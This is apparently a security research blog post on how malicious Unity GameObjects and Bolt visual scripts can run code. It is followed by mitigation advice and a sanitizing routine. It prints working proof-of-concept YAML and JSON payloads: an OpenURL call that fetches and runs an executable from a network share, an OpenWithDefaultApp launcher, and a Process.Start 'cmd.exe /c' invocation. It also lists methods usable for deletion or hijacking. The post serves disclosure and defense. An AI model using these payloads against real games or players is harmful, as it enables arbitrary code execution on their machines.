Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used on Unity’s built-in UI components (such as Buttons) for event handlers (like onClick) . Additionally, you can add ones to objects such as PointerClick, PointerEnter, Scroll, etc. using an EventTrigger component

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo along with some experimenting to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction — they can call any method in a loaded assembly . You can skip to exploitation below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

  • eventID — This is specific to EventTriggers (rather than UI components.) It specifies the type of event, PointerClick, PointerHover, etc. PointerClick is “4”.
  • m_TargetAssemblyTypeName — this is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form: namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all Unity engine stuff as well as a lot of .NET stuff.
  • m_callstate — Determines when the event triggers — only during a game, or also while using the Unity Editor:
    • 0 – UnityEventCallState.Off
    • 1 – UnityEventCallState.EditorAndRuntime
    • 2 – UnityEventCallState.RuntimeOnly
  • m_mode — Determines the argument type of the called function.
    • 0 – EventDefined
    • 1 – Void,
    • 2 – Object,
    • 3 – Int,
    • 4 – Float,
    • 5 – String,
    • 6 – Bool
  • m_target — Specify the Unity object instance that the method will be called on. Specifying m_target: {fileId: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things™. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file, and wait for the game client to trigger the event. OpenURL will then download and execute the payload. 

Below is the event definition I used  in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be on the internet, but I hosted on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>;
int main() {
  FILE* fp = fopen("/tmp/hello");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!) Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*\((string|int|bool|float) [A-Za-z\w_]*\)

After pouring over the 426 discovered methods, I fell a short of getting completely arbitrary code exec from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things™. This is just a small sampling:

Unity.CodeEditor.CodeEditor.SetExternalScriptEditor() Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
PlayerPrefs.DeleteAll() Delete all save games and other stored data.
UnityEditor.FileUtil.UnityDirectoryDelete() Invokes Directory.Delete() on the specified directory.
UnityEngine.ScreenCapture.CaptureScreenshot() Takes a screenshot of the game window to a specified file. Will automatically overwrite the specified file. Can be written to UNC paths in Windows.
UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs() Add flags to be passed to the Il2Cpp compiler.
UnityEditor.BuildPlayerWindow.BuildPlayerAndRun() Trigger the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
Application.Quit(), EditorApplication.Exit() Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some of the systems are more powerful or less powerful. I will focus on Bolt as an example since it’s pretty popular, Unity acquired it, and it’s now free. 

This attack vector was proposed on Peter Clemenko’s blog I mentioned earlier, but it focused on malicious entity injection — I think it should be clarified that, using Bolt, it’s possible for imported GameObjects to achieve arbitrary code execution as well, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before inclusion in their game — first evaluating the asset creator’s trustworthiness before importing it into their project, then reviewing it (more or less carefully depending on how much you trust the creator). 

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double check that Unity validates HTTPS certificates on all platforms your game runs — do this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this creates an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle. 

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third-parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (I’m aware of EventTriggers and various UI elements). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a white list of methods Bolt is allowed to call, and then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.”  Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended, the surface area is just too large and it’s likely something important will be missed, though a combination of white list and black list may be possible with high confidence.

In general game developers need to decide how much protection they want to add at the app layer vs. putting the risk decision in the hands of a game end-user’s own judgement on what mods to run, just like it’s on them what executables they download. That’s fair, but it might be a good idea to at least give the gamers a heads up that this could be dangerous via documentation and notifications in the UI layer. They may not expect that mods could do any harm to their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about Unity’s fix for this and their recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.

❌